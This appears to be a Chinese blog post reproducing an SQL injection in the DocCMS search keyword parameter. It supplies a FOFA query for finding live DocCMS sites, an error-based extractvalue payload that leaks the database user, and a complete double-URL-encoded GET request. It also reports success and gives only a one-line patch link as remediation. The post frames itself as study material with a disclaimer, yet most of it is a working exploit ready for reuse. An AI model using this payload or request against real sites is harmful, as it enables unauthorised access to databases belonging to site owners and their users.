DocCMS keyword SQL注入漏洞复现 [附POC]

文章目录

  • DocCMS keyword SQL注入漏洞复现 [附POC]
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响版本
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现
    • 0x06 修复建议

DocCMS keyword SQL注入漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

DocCMS是一个开源的内容管理系统(CMS)。DocCMS是一个功能完善、易于扩展和使用的开源CMS系统。特别适用于需要动态内容管理和多用户协作的中小型网站和应用。

0x03 影响版本

DocCMS

0x04 漏洞环境

FOFA语法:app=“Doccms”
DocCMS keyword SQL注入漏洞复现 [附POC]_第1张图片

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

payload

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

POC (GET)

GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

PS:POC中的SQL语句需对payload二次URL编码

3.复现

首先对对payload二次URL编码

DocCMS keyword SQL注入漏洞复现 [附POC]_第2张图片DocCMS keyword SQL注入漏洞复现 [附POC]_第3张图片发送数据包,出现数据库报错,执行成功!!!
DocCMS keyword SQL注入漏洞复现 [附POC]_第4张图片

0x06 修复建议

官方修复缓解措施
补丁链接:https://gitee.com/husky/DocCMS

你可能感兴趣的:(漏洞复现,web安全,安全,网络安全,系统安全)